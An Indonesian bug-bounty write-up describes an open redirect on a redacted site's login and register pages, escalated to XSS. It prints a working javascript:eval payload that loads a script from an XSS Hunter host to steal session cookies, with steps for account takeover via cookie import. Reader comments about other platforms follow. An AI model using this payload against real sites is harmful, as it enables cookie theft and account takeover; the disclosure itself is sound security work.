Assalamu’alaikum Wr. Wb.
Hi Bug Hunter!
Dalam artikel ini saya ingin membagikan pengalaman menemukan bug di private program yang saya ikuti di Perisai Korava Platform. Sebelum membaca atikel ini lebih jauh, ada baiknya kita bisa berkenalan terlebih dahulu. Untuk yang baru mengenal, saya biasa dipanggil dengan nickname rootbakar.
Oke, let’s get started…
RESUME:
Bug ini saya temukan di fitur login dan register.
Fitur Login & Register
Kerentanan ini memungkinkan seorang attacker untuk mengambil cookie dari:
-
[Fitur Login] Seorang user yang tidak terauntentikasi (tidak dalam keadaan login sebelumnya) dengan memanfaatkan kerentanan Open Redirect pada login page yang dapat di eskalasi menjadi XSS. Nantinya cookie tersebut dikirimkan ke XSS Hunter melalui payload yang sudah di injeksikan ke dalam url / parameter yang rentan yaitu https://redacted/login?redirect={XSSHUNTER_PAYLOAD_HERE}.
-
[Fitur Register] Seorang user yang terauntentikasi (sudah dalam keadaan login sebelumnya) dengan memanfaatkan kerentanan Open Redirect pada register page yang dapat di eskalasi menjadi XSS. Nantinya cookie tersebut dikirimkan ke XSS Hunter melalui payload yang sudah di injeksikan ke dalam url / parameter yang rentan yaitu https://redacted/register?redirect={XSSHUNTER_PAYLOAD_HERE}.
Pada case ini juga terdapat data leak berupa nomor handphone yang berhasil di dapatkan dari cookie tersebut yang terlihat pada XSS Hunter.
IMPACT:
Kerentanan ini dapat berdampak pada pengambilalihan akun victim (account takeover).
PROOF OF CONCEPT:
Fitur Login:
- Attacker mengirimkan malicious link kepada victim berupa link https://redacted/login?redirect=javascript:eval(%27var%20a=document.createElement(\%27script\%27);a.src=\%27https://28.xss.ht\%27;document.body.appendChild(a)%27)
- Victim mengakses malicious link yang dikirimkan oleh attacker
- Victim login dengan menggunakan akun miliknya (menggunakan nomor handphone)
- Ketika victim berhasil login, attacker akan mendapatkan informasi berupa cookie yang dikirimkan ke email (hasil dari XSS Hunter)
- Attacker mengimport cookie tersebut menggunakan tools cookie-editor
- Attacker melakukan refresh browser dan attacker berhasil login sebagai victim.
Fitur Register:
- Login ke akun A (victim account)
- Attacker mengirimkan malicious link kepada victim berupa https://redacted/register?redirect=javascript:eval(%27var%20a=document.createElement(\%27script\%27);a.src=\%27https://28.xss.ht\%27;document.body.appendChild(a)%27)
- Victim mengakses malicious link yang dikirimkan oleh attacker
- Victim mengisi nama dan mengklik Lanjut
- Attacker mendapatkan informasi berupa cookie yang dikirimkan ke email (hasil dari XSS Hunter)
- Attacker mengimport cookie tersebut menggunakan tools cookie-editor
- Attacker melakukan refresh browser dan attacker berhasil login sebagai victim.
TIMELINE:
- Report: Desember, 2022
- Triage: Desember, 2022 (P3 Severity)
- Fix: On Proccess
- Rewards: Desember, 2022
Begitulah pengalaman yang dapat saya bagikan, semoga artikel ini bermanfaat dan memotivasi rekan-rekan bug hunter lainnya.
Bagi yang bertanya apa itu Perisai Korava Platform?
Perisai Korava Platform adalah bagian dari salah satu product/service di Perisai Cybersecurity untuk mempertemukan bug hunter dan perusahaan/organisasi dengan sistem transparan karena dilakukan verifikasi bug oleh 3 pihak berbeda bertujuan untuk menjaga transparansi dari laporan yang dikirimkan oleh bug hunter. Proses pemberian rewards juga berbeda dengan platform lain, dimana 50% rewards diberikan setelah laporan berstatus triage dan 50% nya lagi setelah dilaksanakan retesting.
Bagi bug hunter yang penasaran untuk mencobanya bisa akses login disini https://app.peris.ai/login/guardian dan ini website https://www.peris.ai/ Perisai Cybersecurity untuk rekan-rekan bug hunter yang ingin mengenal lebih jauh.
Saya rasa cukup untuk artikel ini, jika ada kesalahan atau kekurangan pada penulisan artikel ini saya sangat mengharapkan kritik dan masukan yang membangun dari rekan-rekan bug hunter semua.
Salam sehat dan sukses untuk kita semua.
Best Regards,
rootbakar
Wassalamu’alaikum Wr. Wb.
mas, boleh nanya platform bug bounty untuk indonesia yang biasa dipake selain perisai apa aja ya?
Terima kasih
ada http://redstorm.io dan http://cyberarmy.id
klw perisai itu gimana caranya liat programnya ya mas? soalnya masih maintenance tulisannya
iy bg, emang masih maintenance, di tunggu aja